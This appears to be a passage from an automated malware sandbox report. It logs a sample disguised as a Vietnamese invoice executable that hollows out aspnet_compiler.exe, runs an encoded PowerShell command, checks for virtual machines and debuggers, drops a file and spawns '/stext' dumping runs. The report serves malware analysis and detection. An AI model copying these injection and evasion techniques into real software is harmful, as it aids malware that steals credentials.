              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe TID: 868Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe TID: 5128Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5160Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 5392Thread sleep count: 44 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeLast function: Thread delayed
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,14_2_0040DD85
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9489Jump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: dwn.exe, 00000011.00000002.561697222.0000000004345000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SQEMU\[_EbDU
              Source: aspnet_compiler.exe, 0000000C.00000002.524221761.0000000001367000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oy
              Source: Shhejayly.exe, 00000012.00000002.567010928.0000000006EEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
              Source: Shhejayly.exe, 00000012.00000002.528271926.00000000007FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: aspnet_compiler.exe, 0000000C.00000002.524221761.0000000001367000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWt
              Source: aspnet_compiler.exe, 0000000C.00000002.525361039.000000000137D000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000003.355610378.0000000001377000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Shhejayly.exe, 0000001C.00000002.534013224.000000000091B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
              Source: Shhejayly.exe, 00000012.00000002.528271926.00000000007FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.353332001.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.528271926.00000000007FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: aspnet_compiler.exe, 0000000C.00000002.524221761.0000000001367000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\oy
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_00418981 memset,GetSystemInfo,14_2_00418981
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,12_2_100010F1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_10006580 FindFirstFileExA,12_2_10006580
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0040AE51 FindFirstFileW,FindNextFileW,14_2_0040AE51
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,14_2_0040DD85
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,14_2_004044A4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_10004AB4 mov eax, dword ptr fs:[00000030h]12_2_10004AB4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_10002639 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_10002639
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_1000724E GetProcessHeap,12_2_1000724E
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess token adjusted: Debug
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: Debug
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: Debug
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: Debug
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeMemory allocated: page read and write | page guardJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_10002639 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_10002639
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_100060E2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_10002B1C

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess created: Base64 decoded start-sleep -seconds 20
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess created: Base64 decoded start-sleep -seconds 20Jump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 456000Jump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 46E000Jump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 474000Jump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 475000Jump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 476000Jump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 47B000Jump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: F55008Jump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==Jump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jzlrsem"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jzlrsem"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\ubrkswxpfz"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\evectoiqthdfs"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Users\user\AppData\Local\Temp\dwn.exe "C:\Users\user\AppData\Local\Temp\dwn.exe" Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\ixjslbemgsufoiuudk"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\tzolmupfuamrqwiynvqal"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\tzolmupfuamrqwiynvqal"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\xbsbmhljhlcrmkvfybyknsbrlg"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\ivyunzdcvtueoyrjhmkmqwoatvkpua"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\sxdnnkoerbmjyegnzxxfbjirubcqnlslo"Jump to behavior
